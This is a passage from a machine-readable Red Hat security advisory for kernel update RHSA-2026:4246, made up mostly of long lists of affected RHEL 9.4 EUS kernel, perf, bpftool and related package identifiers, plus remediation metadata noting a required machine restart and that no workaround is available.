"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4246"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
